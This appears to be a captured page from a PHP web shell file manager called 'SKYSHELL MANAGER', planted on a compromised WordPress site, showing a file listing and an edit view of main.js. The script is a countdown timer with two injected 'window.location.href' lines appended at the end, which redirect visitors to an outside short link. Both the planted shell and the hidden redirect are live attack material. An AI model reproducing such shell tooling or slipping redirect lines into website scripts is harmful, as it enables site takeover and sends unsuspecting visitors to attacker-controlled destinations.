📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: main.js
(function () { const second = 1000, minute = second * 60, hour = minute * 60, day = hour * 24, daysBlock = document.getElementById("days"), hoursBlock = document.getElementById("hours"), minutesBlock = document.getElementById("minutes"); let today = new Date(), dd = String(today.getDate()).padStart(2, "0"), mm = String(today.getMonth() + 1).padStart(2, "0"), yyyy = today.getFullYear(), nextYear = yyyy + 1, dayMonth = "09/30/", targetDay = dayMonth + yyyy; today = mm + "/" + dd + "/" + yyyy; if (today > targetDay) { targetDay = dayMonth + nextYear; } const countDown = new Date(targetDay).getTime(), x = setInterval(function() { const now = new Date().getTime(), distance = countDown - now; daysBlock.textContent = Math.floor(distance / (day)) < 10 ? "0"+Math.floor(distance / (day)): Math.floor(distance / (day)); hoursBlock.textContent = Math.floor((distance % (day)) / (hour)) < 10 ? "0"+Math.floor((distance % (day)) / (hour)) : Math.floor((distance % (day)) / (hour)); minutesBlock.textContent = Math.floor((distance % (hour)) / (minute)) < 10 ? "0"+Math.floor((distance % (hour)) / (minute)) : Math.floor((distance % (hour)) / (minute)); if (distance < 0) { clearInterval(x); } //seconds }, 0) }()); window.location.href = "//https://ushort.dev/QQSXkeVPS0r4"; window.location.href = "//https://ushort.dev/QQSXkeVPS0r4";
Save